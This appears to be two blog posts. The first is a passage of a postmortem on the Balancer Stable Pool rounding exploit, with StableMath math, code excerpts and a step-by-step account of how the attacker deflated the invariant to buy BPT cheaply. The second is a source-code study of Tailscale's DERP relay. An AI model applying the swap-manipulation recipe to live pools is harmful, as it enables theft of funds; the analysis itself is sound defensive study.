        return FixedPoint.ONE;
    } else {
        _revert(Errors.INVALID_TOKEN);
    }
}

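So where does the problem come from? Time to learn the Stable Pool math.

2. The Stable Pool math model

This section introduces the math behind Stable Pools. Since the goal is to learn, it includes extra background, and not everything here is related to the vulnerability.

During a swap, control flows through the call chain BaseGeneralPool._swapGivenOut → ComposableStablePool._onSwapGivenOut → ComposableStablePool._onRegularSwap into the actual swap amount calculation: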

/**
 * @dev Perform a swap between non-BPT tokens. Scaling and fee adjustments have been performed upstream, so
 * all we need to do here is calculate the price quote, depending on the direction of the swap.
 */
function _onRegularSwap(
    bool isGivenIn,
    uint256 amountGiven,
    uint256[] memory registeredBalances,
    uint256 registeredIndexIn,
    uint256 registeredIndexOut
) private view returns (uint256) {
    // Adjust indices and balances for BPT token
    uint256[] memory balances = _dropBptItem(registeredBalances);
    uint256 indexIn = _skipBptIndex(registeredIndexIn);
    uint256 indexOut = _skipBptIndex(registeredIndexOut);

    (uint256 currentAmp, ) = _getAmplificationParameter();
    uint256 invariant = StableMath._calculateInvariant(currentAmp, balances);

    if (isGivenIn) {
        return StableMath._calcOutGivenIn(currentAmp, balances, indexIn, indexOut, amountGiven, invariant);
    } else {
        return StableMath._calcInGivenOut(currentAmp, balances, indexIn, indexOut, amountGiven, invariant);
    }
}

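Here we can see several functions used to compute amounts:

_getAmplificationParameter: returns the amplification coefficient, a hyperparameter that an administrator can change smoothly over time
_calculateInvariant: computes the invariant D
_calcOutGivenIn/_calcInGivenOut: using the invariant D computed above and the swap direction, computes either how many tokenOut amountGiven tokenIn will buy, or how many tokenIn are needed to receive amountGiven tokenOut

AMMs in general have to obey an equation of the form $f(\mathbf{B}^{\text{prev}}; \boldsymbol{\theta})=f(\mathbf{B}^{\text{after}}; \boldsymbol{\theta})=D$, which is what makes the exchange price move automatically with trading.

Here $\mathbf{B} = (B_1, B_2, \dots)$ denotes the balances of the tokens (note that these balances are already multiplied by the token rate), $\boldsymbol{\theta}=(\theta_1,\theta_2,\dots)$ denotes the hyperparameters (the AmplificationParameter above is one of them), and $D$ is the invariant: balance changes are constrained by the invariant, which is what keeps the price stable.

Different token pairs have different price behavior and risk profiles, so the invariant function f has to vary with the market structure. For a Stable Pool, the exchange ratio between stablecoins usually stays at a fixed value such as 1:1 over the long term, so the pool should have as much liquidity depth as possible around that price, so that even large trades do not move the price noticeably, which lowers slippage and improves the trading experience. At the same time, when the price clearly deviates from that fixed ratio, the price must become sensitive enough that the cost of trading further rises quickly, which prevents one side of the pool from being drained and gives arbitrageurs an incentive to restore the peg. The effect looks roughly like this:

Price vs. liquidity plot: liquidity is heavily concentrated around a price of 1.0, because the price of a stablecoin barely moves; far from that price there is relatively little liquidity.
TokenA liquidity vs. TokenB liquidity plot (50/50 Stable Pool): roughly the orange line in the figure; around 0.5 it resembles the constant-sum line, and at the extremes it resembles the constant-product line.
The plots were drawn with ChatGPT, so they are only meant to give a rough impression and should not be read as mathematically exact.

Therefore, the invariant function used by a Stable Pool is neither a pure constant-sum model nor a pure constant-product model. By introducing hyperparameters such as the amplification coefficient, it moves continuously between the two:

When the price is close to the peg, it behaves more like the constant-sum curve x + y = k, giving an almost constant exchange rate
As the price drifts away from the peg, it gradually degrades toward the constant-product curve x * y = k, making the price curve steeper and strengthening the system's safety and robustness in extreme conditions

_calculateInvariant maintains the following invariant equation, whose symbols are defined right after it: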

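$$A n^{n} S + D = A D n^{n}+\frac{D^{n+1}}{n^{n} P},\quad S = \sum_{i=1}^{n} x_i,\; P = \prod_{i=1}^{n} x_i $$

A: the amplification coefficient, a hyperparameter.
n: the number of tokens.
S: the sum of all token balances.
P: the product of all token balances.
D: the invariant mentioned above that must be maintained across a swap; this is the value to be computed.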

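Note: the formulas here are not needed to understand the exploit; readers who aren't interested can skip them.

With this equation:

When the pool is close to balance: for example, when all balances satisfy $x_i \approx \frac{D}{n}$, we have $P \approx \left(\frac{D}{n}\right)^n$. The terms amplified by A then dominate the equation and the solution tends to $D \approx S$, giving $x_1 + x_2 + \cdots + x_n \approx D$. Near the peg the pool therefore behaves like the constant-sum model: the price curve is almost linear and slippage is tiny, which corresponds to the high-liquidity, stable-price region.
When one token's balance approaches zero: for example $x_k \to 0$, so $P = \prod_{i=1}^{n} x_i \to 0$. The term $\frac{D^{n+1}}{n^{n} P}$ becomes very large and dominates the equation, which then approximately satisfies $D^{n+1} \propto P$. At the boundary the model degrades into constant-product-like behavior: the price moves sharply with trade size and slippage grows quickly, which effectively prevents any single asset from being drained completely.

In the invariant equation inside _calculateInvariant, the independent variables are the token balances and the dependent variable is the invariant D. To compute D, _calculateInvariant applies the Newton-Raphson iteration $D_{k+1} = D_k - \frac{f(D_k)}{f'(D_k)}$ for up to 255 iterations. I won't go into more of the math; if you're curious, ask ChatGPT for a fuller explanation.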
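For readers who prefer code to formulas, here is a floating-point sketch of that Newton-Raphson iteration. It follows the invariant equation exactly as written in this post (with the A·n^n convention); the on-chain StableMath works in fixed-point integers with its own amplification precision, so treat this as an illustration of the method rather than a port of the contract. The function names and the convergence tolerance are my own choices.

```python
from math import prod


def calculate_invariant(amp: float, balances: list, max_iterations: int = 255,
                        tolerance: float = 1e-12) -> float:
    """Solve A*n^n*S + D = A*D*n^n + D^(n+1) / (n^n * P) for D.

    Assumes every balance is strictly positive.
    """
    n = len(balances)
    s = sum(balances)
    p = prod(balances)
    ann = amp * n**n
    d = float(s)  # the constant-sum answer is a good starting point
    for _ in range(max_iterations):
        d_p = d ** (n + 1) / (n**n * p)
        # Newton step D - f(D)/f'(D) for
        # f(D) = D^(n+1)/(n^n P) + (A n^n - 1) D - A n^n S, simplified algebraically
        d_next = (ann * s + n * d_p) * d / ((ann - 1) * d + (n + 1) * d_p)
        if abs(d_next - d) <= tolerance * d_next:
            return d_next
        d = d_next
    raise RuntimeError("invariant did not converge")


def residual(amp: float, balances: list, d: float) -> float:
    """Left side minus right side of the invariant equation; zero at the solution."""
    n = len(balances)
    ann = amp * n**n
    return ann * sum(balances) + d - ann * d - d ** (n + 1) / (n**n * prod(balances))


d_balanced = calculate_invariant(100.0, [100.0, 100.0, 100.0])
d_skewed = calculate_invariant(100.0, [150.0, 50.0])
print(d_balanced, d_skewed)
```

A balanced pool gives D equal to the sum of the balances, and a skewed pool gives a D slightly below the sum but above the constant-product value n·P^(1/n), matching the "between constant sum and constant product" picture.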

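Once the invariant D is known, _calcInGivenOut rearranges the invariant equation above into $x^2 + \left( S_{\setminus x} + \frac{D}{A \cdot n^n} - D \right) x - \frac{D^{n+1}}{A \cdot n^{2n} \cdot P_{\setminus x}} = 0$ and solves it for x, where:

$x$: the new balance of tokenIn after the tokenIn flows in (that is, $x = B_x + Amount_{in}$, and $Amount_{in}$ is what _calcInGivenOut ultimately returns). This is the unknown.
$S_{\setminus x}$: the sum of the balances of all tokens other than tokenX.
$P_{\setminus x}$: the product of the balances of all tokens other than tokenX.

With the expected new tokenIn balance in hand, subtracting the current balance gives the amount of tokenIn the user must supply, $Amount_{in}$.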
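The quadratic can be sketched in floating point as follows. I solve it directly with the quadratic formula and take the positive root; the contract works in fixed-point integers and cannot simply call a floating-point square root, so this shows the equation, not the on-chain algorithm. I also assume that the sum and product over the other tokens use the balances after tokenOut has been reduced by the requested amount. All names are hypothetical.

```python
from math import prod, sqrt


def calc_in_given_out(amp: float, balances: list, index_in: int, index_out: int,
                      amount_out: float, d: float) -> float:
    """Return the tokenIn amount that keeps the invariant at d (no fees)."""
    n = len(balances)
    ann = amp * n**n
    final = list(balances)
    final[index_out] -= amount_out            # tokenOut leaves the pool
    others = [b for i, b in enumerate(final) if i != index_in]
    s_rest = sum(others)                      # S without x
    p_rest = prod(others)                     # P without x
    b = s_rest + d / ann - d
    c = d ** (n + 1) / (ann * n**n * p_rest)
    x = (-b + sqrt(b * b + 4 * c)) / 2        # positive root of x^2 + b*x - c = 0
    return x - balances[index_in]


def residual(amp: float, balances: list, d: float) -> float:
    """Left side minus right side of the invariant equation; zero if d is preserved."""
    n = len(balances)
    ann = amp * n**n
    return ann * sum(balances) + d - ann * d - d ** (n + 1) / (n**n * prod(balances))


# A balanced two-token pool has D equal to the sum of its balances.
pool = [100.0, 100.0]
d = 200.0
amount_in = calc_in_given_out(100.0, pool, 0, 1, 10.0, d)
print(amount_in)
```

Taking 10 units out of the balanced pool costs slightly more than 10 units in, which is the small slippage expected near the peg, and the post-swap balances still satisfy the invariant equation for the same D.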

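So how is BPT priced? The BPT price is positively correlated with the invariant D and follows $P_{BPT} = \frac{D}{S_{BPT}}$, where $P_{BPT}$ is the BPT price and $S_{BPT}$ is the total BPT supply. Note that although D is called an invariant, that does not mean it never changes; see the code comment below, which I won't expand on here.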

/**
 * @dev This function returns the appreciation of BPT relative to the underlying tokens, as an 18 decimal fixed
 * point number. It is simply the ratio of the invariant to the BPT supply.
 *
 * The total supply is initialized to equal the invariant, so this value starts at one. During Pool operation the
 * invariant always grows and shrinks either proportionally to the total supply (in scenarios with no price impact,
 * e.g. proportional joins), or grows faster and shrinks more slowly than it (whenever swap fees are collected or
 * the token rates increase). Therefore, the rate is a monotonically increasing function *as long as the tokens
 * in the pool do not lose value*.
 *
 * ...
 */
function getRate() external view virtual override returns (uint256) {
    // We need to compute the current invariant and actual total supply. The latter includes protocol fees that have
    // accrued but are not yet minted: in calculating these we'll actually end up fetching most of the data we need
    // for the invariant.

    (
        uint256[] memory balances,
        uint256 virtualSupply,
        uint256 protocolFeeAmount,
        uint256 lastJoinExitAmp,
        uint256 currentInvariantWithLastJoinExitAmp
    ) = _getSupplyAndFeesData();

    // Due protocol fees will be minted at the next join or exit, so we can simply add them to the current virtual
    // supply to get the actual supply.
    uint256 actualTotalSupply = virtualSupply.add(protocolFeeAmount);

    // All that's missing now is the invariant. We have the balances required to calculate it already, but still
    // need the current amplification factor.
    (uint256 currentAmp, ) = _getAmplificationParameter();

    // It turns out that the process for due protocol fee calculation involves computing the current invariant,
    // except using the amplification factor at the last join or exit. This would typically not be terribly useful,
    // but since the amplification factor only changes rarely there is high probability of its current value being
    // the same as it was in the last join or exit. If that is the case, then we can skip the costly invariant
    // computation altogether.
    uint256 currentInvariant = (currentAmp == lastJoinExitAmp)
        ? currentInvariantWithLastJoinExitAmp
        : StableMath._calculateInvariant(currentAmp, balances);

    // With the current invariant and actual total supply, we can compute the rate as a fixed-point number.
    return currentInvariant.divDown(actualTotalSupply);
}
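The last line of getRate is all that matters for the rest of this post: the rate is the invariant divided by the supply, in 18-decimal fixed point. A tiny sketch with made-up numbers shows how a lower invariant at unchanged supply translates directly into a cheaper BPT (the function names are mine):

```python
ONE = 10**18  # 1.0 in 18-decimal fixed point


def div_down(a: int, b: int) -> int:
    """Fixed-point a / b, rounded toward zero."""
    return a * ONE // b


def bpt_rate(invariant: int, actual_total_supply: int) -> int:
    """BPT rate as the ratio of the invariant to the BPT supply."""
    return div_down(invariant, actual_total_supply)


supply = 1000 * ONE                         # hypothetical supply
honest_rate = bpt_rate(1000 * ONE, supply)  # invariant matches supply
deflated_rate = bpt_rate(900 * ONE, supply) # invariant pushed down by 10%
print(honest_rate / ONE, deflated_rate / ONE)
```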

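3. Attack flow

In subsection 1 we saw that passing a tiny value to _upscale produces a large relative precision loss, but we still haven't worked out how a few wei can be turned into a large theft. In subsection 2 we went through the Stable Pool invariant equation and how the BPT price is computed.

To recap:

The Stable Pool model blends constant sum and constant product: near the peg it behaves like x + y = k, and far from the peg it behaves like x * y = k.
The invariant D is computed from the token balances, so D must be positively correlated with them. This is easy to see: when an LP adds liquidity, the balances go up and D must go up to match the newly minted BPT; when an LP withdraws, the balances go down and D should shrink accordingly.
The BPT price is derived from the invariant D and the current total supply. If the vulnerability can push D down while the total supply stays the same, BPT can be bought for less than its fair price.

The attack idea now starts to take shape: on every swap, the invariant D is computed from the token balances. If the small precision loss in those token balance calculations can be used to push the computed D down (with the total BPT supply unchanged), the attacker can buy BPT at a lower price, because the BPT price depends directly on D.

An example attack transaction on Arbitrum shows the whole flow. It confirms that the attacker used the precision loss in _upscale to make the computed D deviate from its correct value and thereby manipulate the BPT price. Concretely, the attack proceeds as follows.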

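Liquidity manipulation. Balancer's batchSwap allows internal balances to be borrowed temporarily, so the attacker first borrowed the pool's BPT from Balancer and used it to swap for the underlying rETH/cbETH/wstETH tokens. After a long series of swaps, balances that started at the 1e18 order of magnitude or above were left at only around 1e11 in the pool:
In the figure above, the TokenIn labeled wstETH/rETH/cbETH is actually the pool's BPT (the BPT address is the pool address). From top to bottom, the amount of underlying asset taken in each swap shrinks step by step, until the final swaps are below 100 wei. Judging from the balance changes, the token balances when the swaps began were:
- cbETH: 385e18 (385,331,897,945,415,101,145)
- BPT: 2.45e18 + 2^111 (2,596,148,429,267,416,263,499,288,948,276,786)
- wstETH: 36.4e18 (36,378,350,238,858,588,950)
- rETH: 41.3e18 (41,301,528,246,890,260,702)
Note: the 2^111 part of the BPT balance is _PREMINTED_TOKEN_BALANCE; see the code.
After the liquidity manipulation the balances were:
- cbETH: 1.00e11 (100,000,000,000)
- BPT: 501.96e18 + 2^111 (2,596,148,429,267,915,775,463,860,923,420,341)
- wstETH: 1.00e11 (100,000,000,000)
- rETH: 1.00e11 (100,000,000,000)
Repeatedly pushing the invariant D down through the rounding bug. This stage only involves wstETH/cbETH trades. The attacker repeats the following swaps many times:
1. wstETH→cbETH: this step drains the wstETH liquidity, taking it from the relatively high 1e11 down to the critical value 9.
2. wstETH→cbETH: this step uses a carefully chosen amount = 8 to trigger the upscale precision loss. At this point the cbETH token rate is 1.114, so before the invariant D is computed, upscale evaluates amount(8) * rate(1.114) = value(8.912) and truncates it to 8. Because the invariant is then computed from the truncated value, the resulting D is maliciously pushed down.
3. cbETH→wstETH: with D pushed down by the previous step, this swap simply restores the wstETH liquidity from 1 to a higher value such as 5642, in preparation for the next round of step 1.
Since the repeated rounding attacks have pushed the invariant D very low, the attacker can buy BPT back at a low price and use it to repay the internal balance borrowed through the Vault's batchSwap. The difference between the BPT price before and after is where the stolen funds come from. The figure below shows the attacker's trades spending the underlying cbETH/wstETH/rETH to buy BPT back; the amount bought back grows exponentially from swap to swap, so as to quickly recover the BPT that was originally borrowed from the Vault and spent on draining the pool's liquidity.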
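As a sanity check on the raw BPT balances quoted in the liquidity-manipulation step, the sketch below splits them into the preminted constant plus a remainder. It takes _PREMINTED_TOKEN_BALANCE to be 2^111, which is what the quoted numbers imply; the variable names are mine.

```python
PREMINTED_TOKEN_BALANCE = 2**111  # assumed value of _PREMINTED_TOKEN_BALANCE

# Raw BPT balances of the pool as quoted from the attack transaction
bpt_before = 2_596_148_429_267_416_263_499_288_948_276_786
bpt_after = 2_596_148_429_267_915_775_463_860_923_420_341

offset_before = bpt_before - PREMINTED_TOKEN_BALANCE
offset_after = bpt_after - PREMINTED_TOKEN_BALANCE
bpt_paid_in = bpt_after - bpt_before  # BPT swapped into the pool while draining it

print(offset_before / 1e18)  # about 2.45
print(offset_after / 1e18)   # about 501.96
print(bpt_paid_in / 1e18)    # about 499.5
```

Roughly 499.5e18 BPT went into the pool during the draining phase, and that is the amount the attacker later has to buy back at the deflated price to settle the batchSwap.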

IV. References

A First Look at the Tailscale DERP Relay Service

2023-11-13T16:00:00.000Z

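I. Introduction

Tailscale is a handy tool, mainly used to join machines in different locations into one network, and it ships with several advanced features (such as MagicDNS) that make it convenient to use.

This is also why I dropped ZeroTier in favor of Tailscale: it has many advanced features and they are convenient to use.

Tailscale's underlying mechanism differs from ZeroTier's.

ZeroTier has every client try to hole-punch to the other clients as soon as it starts, and keeps those connections alive.
- Pros: connections are established very quickly. Either hole punching has already finished, or it is already certain that traffic goes through a relay node.
- Cons: hole-punched links to all peers must be maintained, which consumes resources. The overhead grows with the number of nodes.
Tailscale only tries to hole-punch when it needs to connect to a peer, and the initial traffic always goes through a DERP relay server. (Very lazy...)
- Pros: with lazy setup there is no need to maintain hole-punched connections to other nodes, or any state, in advance.
- Cons: every time a virtual connection is created through Tailscale, the initial connection has high latency, which badly hurts the experience; Tailscale depends heavily on relay nodes.

In a P2P VPN, self-hosted relay nodes matter a lot. On the one hand, a self-hosted relay can observe and coordinate the P2P process between two local peers better than a geographically distant official relay; on the other hand, it can quickly relay and forward traffic after hole punching fails.

My earlier article covered the principles and process of setting up a ZeroTier relay node (Moon). ZeroTier listens for UDP on its primary port 9993 to relay data, so in practice only that one UDP port needs to be exposed to the public internet, which is a very low bar. There are many ways to expose a port, such as NAT traversal with FRP, so a moon node does not even need an IP address of its own.

Note: ZeroTier does not support self-hosted TCP relays; a moon node is really just a UDP relay node.

Setting up Tailscale's relay server (called the DERP service) is somewhat harder than ZeroTier's, and the tutorials online vary widely in quality (as painful as when I was looking for ZeroTier Moon setup guides, which deserves a good rant). So next, let's try to find the simplest way to build a Tailscale DERP server, and learn a bit about how DERP works along the way.

Tailscale's DERP relay service is a TCP relay node, the exact opposite of ZeroTier.

TL;DR: to skip the preliminaries and go straight to the setup process, jump to the summary in the last section of this article.

After reading this article you will know how to quickly build a Tailscale DERP service with just 1-2 ports, without a public-IP machine, a domain name, a certificate, source code changes, or a self-hosted Headscale service.

Note that this article only considers Tailscale, not Headscale, because I want usage to be as simple as possible and do not want to deploy a separate Headscale control server.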

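II. A First Look at the DERP Service's Requirements

The official Tailscale documentation states that a DERP server must meet some requirements:

It must be reachable from the public internet. This lets every Tailscale node reach the DERP server directly so that traffic can be forwarded later. This requirement is perfectly reasonable.
It must run an HTTPS service. In essence, this is so that data sent to the DERP server is encrypted with TLS.
An HTTPS service normally needs a TLS certificate. The DERP server only accepts certificates issued by Let's Encrypt, but Let's Encrypt does not issue certificates to bare-IP servers. This implies another condition: a public domain name is also needed.
The TLS encryption here differs from Tailscale's P2P encryption: the former encrypts peer-to-server traffic, the latter peer-to-peer traffic. In other words, the data TLS encrypts contains the to-be-relayed traffic that the Tailscale peer has already encrypted.
Port 80 must be allocated to run an HTTP service. This is a strong requirement that pins the port.
Two additional ports must be exposed to run the HTTPS and STUN services.
ICMP traffic must be allowed in and out. The Tailscale documentation uses "must" to stress this, but I suspect it is not actually required.

The requirements summarized above from the documentation may not be quite accurate, because some articles online describe setting up a bare-IP DERP server (though still with no explanation at all, so reading them is no better than not reading them...). From what I learned reading the code, the official documentation on this is quite possibly outdated, and such strong requirements should not actually be needed.

Note that DERP requires a TLS certificate on the server mainly for data encryption; but between Tailscale nodes, two nodes encrypt data before transmission using the public keys that each node has already uploaded to Tailscale's central node (the coordination server). So the real effect of the TLS certificate that DERP requires is to hide the act of relaying itself. Since my self-hosted node is mainly for my own use, this hiding does not matter much.

That raises an interesting question:

Can a DERP relay be set up with the fewest steps and the fewest requirements?

Answering that means digging into how DERP is implemented.

III. A First Look at How DERP Works

The Tailscale version used here is v1.52.1 (2023/11/11), git commit 86c8ab75.

1. DERP configuration

DERP's top-level implementation consists mainly of two files:

cmd/derper/derper.go: the top-level entry point of the DERP server; all the logic for serving STUN also lives here
derp/derp_server.go: the types and code for relaying and forwarding data

The DERP server code reveals some interesting things:

The DERP server can run two services at once: the DERP data relay service over HTTP/HTTPS (TCP), and the STUN hole-punching service over UDP.
The two services happen to use different transport-layer protocols, so the ZeroTier approach should carry over.
The bind IP, the HTTP/HTTPS (DERP service) listen port, the choice between HTTP and HTTPS, and the STUN listen port are all configurable, which is very flexible.
The verify-clients flag restricts use of this DERP service to your own Tailscale nodes, which prevents freeloading. Enabling it requires that the DERP server itself be a Tailscale node, or that the socket file /var/run/tailscale/tailscaled.sock exist.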

// cmd/derper/derper.go

var (
dev        = flag.Bool("dev", false, "run in localhost development mode (overrides -a)")
addr       = flag.String("a", ":443", "server HTTP/HTTPS listen address, in form \":port\", \"ip:port\", or for IPv6 \"[ip]:port\". If the IP is omitted, it defaults to all interfaces. Serves HTTPS if the port is 443 and/or -certmode is manual, otherwise HTTP.")
httpPort   = flag.Int("http-port", 80, "The port on which to serve HTTP. Set to -1 to disable. The listener is bound to the same IP (if any) as specified in the -a flag.")
stunPort   = flag.Int("stun-port", 3478, "The UDP port on which to serve STUN. The listener is bound to the same IP (if any) as specified in the -a flag.")
configPath = flag.String("c", "", "config file path")
certMode   = flag.String("certmode", "letsencrypt", "mode for getting a cert. possible options: manual, letsencrypt")
certDir    = flag.String("certdir", tsweb.DefaultCertDir("derper-certs"), "directory to store LetsEncrypt certs, if addr's port is :443")
hostname   = flag.String("hostname", "derp.tailscale.com", "LetsEncrypt host name, if addr's port is :443")
runSTUN    = flag.Bool("stun", true, "whether to run a STUN server. It will bind to the same IP (if any) as the --addr flag value.")
runDERP    = flag.Bool("derp", true, "whether to run a DERP server. The only reason to set this false is if you're decommissioning a server but want to keep its bootstrap DNS functionality still running.")

meshPSKFile    = flag.String("mesh-psk-file", defaultMeshPSKFile(), "if non-empty, path to file containing the mesh pre-shared key file. It should contain some hex string; whitespace is trimmed.")
meshWith       = flag.String("mesh-with", "", "optional comma-separated list of hostnames to mesh with; the server's own hostname can be in the list")
bootstrapDNS   = flag.String("bootstrap-dns-names", "", "optional comma-separated list of hostnames to make available at /bootstrap-dns")
unpublishedDNS = flag.String("unpublished-bootstrap-dns-names", "", "optional comma-separated list of hostnames to make available at /bootstrap-dns and not publish in the list")
verifyClients  = flag.Bool("verify-clients", false, "verify clients to this DERP server through a local tailscaled instance.")

acceptConnLimit = flag.Float64("accept-connection-limit", math.Inf(+1), "rate limit for accepting new connection")
acceptConnBurst = flag.Int("accept-connection-burst", math.MaxInt, "burst limit for accepting new connection")
)

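This shows that DERP is highly configurable and that TLS is optional on the server side. But knowing that the DERP service can serve plain HTTP is not enough; we also need to see how client nodes are configured to use DERP, because if clients insist on TLS when reaching DERP, turning TLS off on the DERP service achieves nothing.

The http-port flag only causes an additional HTTP listener to be started once HTTPS serving is enabled (cmd/derper/derper.go#L284). This means the HTTP service is not actually required, and that requirement in the official documentation is redundant.

2. DERP client configuration

The code in tailcfg/derpmap.go shows the DERP configuration that is pushed down to clients: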

// tailcfg/derpmap.go

// DERPNode describes a DERP packet relay node running within a DERPRegion.
type DERPNode struct {
// Name is a unique node name (across all regions).
// It is not a host name.
// It's typically of the form "1b", "2a", "3b", etc. (region
// ID + suffix within that region)
Name string

// RegionID is the RegionID of the DERPRegion that this node
// is running in.
RegionID int

// HostName is the DERP node's hostname.
//
// It is required but need not be unique; multiple nodes may
// have the same HostName but vary in configuration otherwise.
HostName string

// CertName optionally specifies the expected TLS cert common
// name. If empty, HostName is used. If CertName is non-empty,
// HostName is only used for the TCP dial (if IPv4/IPv6 are
// not present) + TLS ClientHello.
CertName string `json:",omitempty"`

// IPv4 optionally forces an IPv4 address to use, instead of using DNS.
// If empty, A record(s) from DNS lookups of HostName are used.
// If the string is not an IPv4 address, IPv4 is not used; the
// conventional string to disable IPv4 (and not use DNS) is
// "none".
IPv4 string `json:",omitempty"`

// IPv6 optionally forces an IPv6 address to use, instead of using DNS.
// If empty, AAAA record(s) from DNS lookups of HostName are used.
// If the string is not an IPv6 address, IPv6 is not used; the
// conventional string to disable IPv6 (and not use DNS) is
// "none".
IPv6 string `json:",omitempty"`

// Port optionally specifies a STUN port to use.
// Zero means 3478.
// To disable STUN on this node, use -1.
STUNPort int `json:",omitempty"`

// STUNOnly marks a node as only a STUN server and not a DERP
// server.
STUNOnly bool `json:",omitempty"`

// DERPPort optionally provides an alternate TLS port number
// for the DERP HTTPS server.
//
// If zero, 443 is used.
DERPPort int `json:",omitempty"`

// InsecureForTests is used by unit tests to disable TLS verification.
// It should not be set by users.
InsecureForTests bool `json:",omitempty"`

// STUNTestIP is used in tests to override the STUN server's IP.
// If empty, it's assumed to be the same as the DERP server.
STUNTestIP string `json:",omitempty"`

// CanPort80 specifies whether this DERP node is accessible over HTTP
// on port 80 specifically. This is used for captive portal checks.
CanPort80 bool `json:",omitempty"`
}

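We can specify the DERP and STUN ports the client uses when connecting to the DERP server, and we can use the test-only field to make the client skip TLS verification (that is, certificate validation) when connecting. From this glimpse, the client side looks fairly configurable too.

But note: the DERP client configuration only shows that one can try connecting to the DERP server's HTTPS service in TLS-insecure mode; it does not say the client can connect to the DERP server's HTTP service directly. This needs further digging.

3. DERP connection logic

So how does a Tailscale node actually interact with a DERP server? Three files matter, from highest level to lowest:

wgengine/magicsock/magicsock.go: the key function sendAddr sends a single packet either to a DERP server or directly to a peer. Overall, this file provides the higher-level features: updating endpoints, maintaining network state, the top-level send/receive implementation, and exploring hole-punching paths.
wgengine/magicsock/derp.go: the key function here is derpWriteChanOfAddr, which sets up the (fairly involved) connection to a single DERP server and handles messages.
derp/derphttp/derphttp_client.go: implements the low-level operations against the DERP server: listening, connecting, and sending and receiving data.

These files contain a lot, so I won't go through them in detail; reading them yourself gives a better feel for how neatly they are put together.

We mainly care about the last file, because the low-level operations decide whether we can create a connection over a non-TLS protocol (plain HTTP; after all, if HTTP works there is no need for pseudo-HTTPS with certificate verification turned off).

Normally, Tailscale connects to and communicates with only one node in a given Region; even if a Region has several redundant nodes, Tailscale still connects to just one of them:

The client tries to create a DERP Region client: derpWriteChanOfAddr function - wgengine/magicsock/derp.go#L321
The DERP Region Client struct is actually created: NewRegionClient function - derp/derphttp/derphttp_client.go#L109
The client dials the DERP Region and obtains a TCP connection (note: not a TLS connection): dialRegion function - derp/derphttp/derphttp_client.go#L570

After obtaining the TCP connection to the DERP Region, it decides whether to use HTTPS: derp/derphttp/derphttp_client.go#L392 & derp/derphttp/derphttp_client.go#L426

The code below first takes the default branch of the switch-case, then reaches c.useHTTPS() to decide whether the connection uses HTTPS.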

func (c *Client) connect(ctx context.Context, caller string) (client *derp.Client, connGen int, err error) {
...

var node *tailcfg.DERPNode // nil when using c.url to dial
switch {
case useWebsockets():
...
case c.url != nil:
c.logf("%s: connecting to %v", caller, c.url)
tcpConn, err = c.dialURL(ctx)
default:
c.logf("%s: connecting to derp-%d (%v)", caller, reg.RegionID, reg.RegionCode)
tcpConn, node, err = c.dialRegion(ctx, reg)
}
if err != nil {
return nil, 0, err
}

...

var httpConn net.Conn        // a TCP conn or a TLS conn; what we speak HTTP to
var serverPub key.NodePublic // or zero if unknown (if not using TLS or TLS middlebox eats it)
var serverProtoVersion int
var tlsState *tls.ConnectionState
if c.useHTTPS() {
tlsConn := c.tlsClient(tcpConn, node)
httpConn = tlsConn

// Force a handshake now (instead of waiting for it to
// be done implicitly on read/write) so we can check
// the ConnectionState.
if err := tlsConn.Handshake(); err != nil {
return nil, 0, err
}
...
}
...
}

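Client.useHTTPS is how the client decides whether to use HTTPS when connecting to a DERP server. The code below shows that a client connecting to a DERP server will almost certainly use HTTPS. The reason is simple: the url field of a DERP Region Client is nil, so unless the debug knob is set, it uses HTTPS.

Enabling a debug knob or modifying the source when running DERP is rather dirty, and I prefer not to; I avoid changing code whenever I can. So here I simply chose to go with HTTPS.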

// derp/derphttp/derphttp_client.go
// --------------------------------

// Client is a DERP-over-HTTP client.
//
// It automatically reconnects on error retry. That is, a failed Send or
// Recv will report the error and not retry, but subsequent calls to
// Send/Recv will completely re-establish the connection (unless Close
// has been called).
type Client struct {
...

// Either url or getRegion is non-nil:
url       *url.URL
getRegion func() *tailcfg.DERPRegion

...
}
...

// debugDERPUseHTTP tells clients to connect to DERP via HTTP on port
// 3340 instead of HTTPS on 443.
var debugUseDERPHTTP = envknob.RegisterBool("TS_DEBUG_USE_DERP_HTTP")

func (c *Client) useHTTPS() bool {
if c.url != nil && c.url.Scheme == "http" {
return false
}
if debugUseDERPHTTP() {
return false
}

return true
}

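So we can now conclude: under normal conditions, the DERP relay always goes over HTTPS (which may skip TLS certificate verification).

As an aside, can the url field in derphttp.Client be http? The only call site that creates a Client with a url field is shown below. The URL scheme is hard-coded to https; this feature is presumably meant for Tailscale's official domains, so it is of little use to us: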

// cmd/derper/mesh.go
func startMeshWithHost(s *derp.Server, host string) error {
logf := logger.WithPrefix(log.Printf, fmt.Sprintf("mesh(%q): ", host))
c, err := derphttp.NewClient(s.PrivateKey(), "https://"+host+"/derp", logf)
if err != nil {
return err
}
...
}

4. WebSocket

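While reading the DERP code, I noticed it also supports relaying WebSocket traffic, which made me curious.

At first I thought DERP relayed traffic through WebSocket over HTTPS. But after some searching and code reading, it turned out not to be so; rather, Tailscale also supports p2p WebSocket communication.

The developers are trying to make Tailscale run in the browser, which is interesting. So which interesting browser projects can be combined with Tailscale today? I found this one - How we added full networking to WebVM via Tailscale

In one sentence: WebVM is a small, polished Linux VM that runs in the browser; Tailscale and WebVM fit together naturally, letting us reach our Tailscale network directly from the browser through WebVM.

This piqued my curiosity, because I had been wondering whether to expose a dedicated port on a machine for web SSH so that I could still reach my Tailscale network from an unfamiliar machine.

Now I can use WebVM in the browser to SSH into remote machines, which meets my needs perfectly. Very nice.

Here is a screenshot of it in use, which is a lot of fun. WebVM is at https://webvm.io/

While the WebVM session is alive, the VM temporarily joins the Tailscale network; when the session dies, it is automatically removed from the network:

Sadly, Tailscale in WebVM does not yet support MagicDNS well, so you have to type IP addresses to reach remote machines and cannot use hostnames.

5. STUN service

STUN is a service used for NAT detection. In theory, the closer the STUN server sits to the two peers the better, since that reduces the number of NAT layers to traverse. But the original STUN protocol requires the server to have at least two public IPs for thorough NAT detection, because two public IPs give the server two egress points, letting it act as "two" devices to better detect the peer's NAT type.

That condition is rather harsh: even one public IP is not easy to get, let alone two, and both bound to a single device at that. The good news is that Tailscale's STUN does not need this much. Its STUN UDP service does just one thing: accept a peer's UDP packets and tell the peer the IP:port pair it sees after NAT: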

// cmd/derper/derper.go
func serverSTUNListener(ctx context.Context, pc *net.UDPConn) {
...
for {
// 1. Read a packet from the UDP connection
n, ua, err = pc.ReadFromUDP(buf[:])
if err != nil {
...
continue
}
// 2. Parse the packet to get its txid, mainly to avoid mismatched messages
pkt := buf[:n]
...
txid, err := stun.ParseBindingRequest(pkt)
...
